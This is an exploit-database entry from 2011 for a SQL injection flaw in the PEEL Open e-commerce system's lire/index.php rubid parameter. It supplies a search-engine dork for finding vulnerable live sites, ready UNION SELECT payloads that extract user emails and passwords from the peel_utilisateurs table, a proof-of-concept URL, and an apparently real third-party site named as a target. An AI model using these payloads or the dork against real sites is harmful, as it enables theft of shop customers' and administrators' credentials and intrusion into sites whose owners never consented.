PEEL Open e-commerce systems Sensitive Database Disclosure Vulnerability

2011-05-23T00:00:00
ID 1337DAY-ID-16162
Type zdt
Reporter ^Xecuti0N3r
Modified 2011-05-23T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            #(+)Exploit Title: PEEL Open e-commerce systems Sensitive Database Disclosure Vulnerability
#(+)Author   : ^Xecuti0n3r
#(+) E-mail  :  xecuti0n3r()yahoo.com
#(+) dork    : inurl:"lire/index.php?rubid="
#(+) Category  : Web Apps [SQli]

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm ^Xecuti0n3r member from Inj3ct0r Team              1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
  
____________________________________________________________________
____________________________________________________________________
  
Choose any site that comes up when you enter the dork intext:"inurl:"lire/index.php?rubid=" in search engine
  
  
    *SQL injection Vulnerability*

#      [+]http://site.com/lire/index.php?rubid=-1
#      [+]http://site.com/lire/index.php?rubid=[SQLi]

SQLi code to be used are as below : 
+UNION+SELECT+1,concat_ws(0x3a,email,mot_passe),3+ from+peel_utilisateurs--
: +UNION+SELECT+1,concat_ws(0x3a,email,mot_passe),3+ from+utilisateurs--

POC: 
http://localhost/lire/index.php?rubid=-1+UNION+SELECT+1,concat_ws(0x3a,email,mot_passe),3+from+peel_utilisateurs--


Using the Dork  we can find quite a lot of sites using this Designer with the same vulnerability..
Couple of Examples being:

http://slave.com/lire/index.php?rubid=-1
http://www.motorloisirs.com/lire/index.php?rubid=-3

etc..



____________________________________________________________________
____________________________________________________________________
  
########################################################################
(+)Exploit Coded by: ^Xecuti0N3r 
(+)Special Thanks to: MaxCaps, d3M0l!tioN3r, aNnIh!LatioN3r
(+)Gr33ts to : Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com) + All the 31337 Members :)
(+)<3 to :Indian Cyber Army & Indishell Crew
(+)Gr33ts to : exploit-id.com , packetstormsecurity.org , securityreason.com
########################################################################



#  0day.today [2018-01-04]  #